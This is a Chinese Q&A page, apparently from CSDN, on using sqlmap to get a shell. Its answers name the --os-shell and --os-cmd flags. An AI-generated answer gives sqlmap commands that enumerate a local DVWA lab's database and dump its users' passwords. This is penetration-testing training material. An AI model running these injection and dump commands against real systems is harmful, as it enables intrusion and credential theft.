sqlmap怎样测试拿到shell

Python在windows上电脑上下载了,sqlmap好不容易下载了我想用但是不会

好像打错字了

#：运行任意操作系统的命令
--os-cmd
--os-shell 

更多内容请看

https://blog.csdn.net/hmysn/article/details/126019498

• 你可以看下这个问题的回答https://ask.csdn.net/questions/7631990
• 你也可以参考下这篇文章：Python3操作sqlmap
• 您还可以看一下 林晓炜老师的网络安全工程师演示：新手如何入门学习SqlMap数据库注入神器课程中的 小白如何下载Python2.7.18运行环境？小节, 巩固相关知识点
  
• 以下回答由chatgpt基于相关博客总结生成:

  以下是使用sqlmap获取shell的步骤和方法：

  1. 首先确保你已经在Windows电脑上成功下载并安装了Python和sqlmap。

  2. 打开DVWA，并在输入框中提交一些数据，然后使用Burp Suite等抓包工具获取提交的数据信息以及cookie信息。

  3. 打开命令提示符（CMD）窗口，输入以下命令以获取当前数据库的版本和数据库名：

  python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" --current-db
  

  1. 输入以下命令以获取DVWA数据库中的表名：

  python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" -D dvwa --tables
  

  1. 输入以下命令以获取某一表中的字段名：

  python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" -D dvwa -T users --columns
  

  1. 输入以下命令以获取某一表中特定字段的数据内容：

  python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --data="id=1&Submit=Submit" --cookie="security=high; PHPSESSID=1or6kpckk0o78pebjhgh99qfa9" -D dvwa -T users -C user,password --dump
  

  这样就可以获取到我们想要的数据。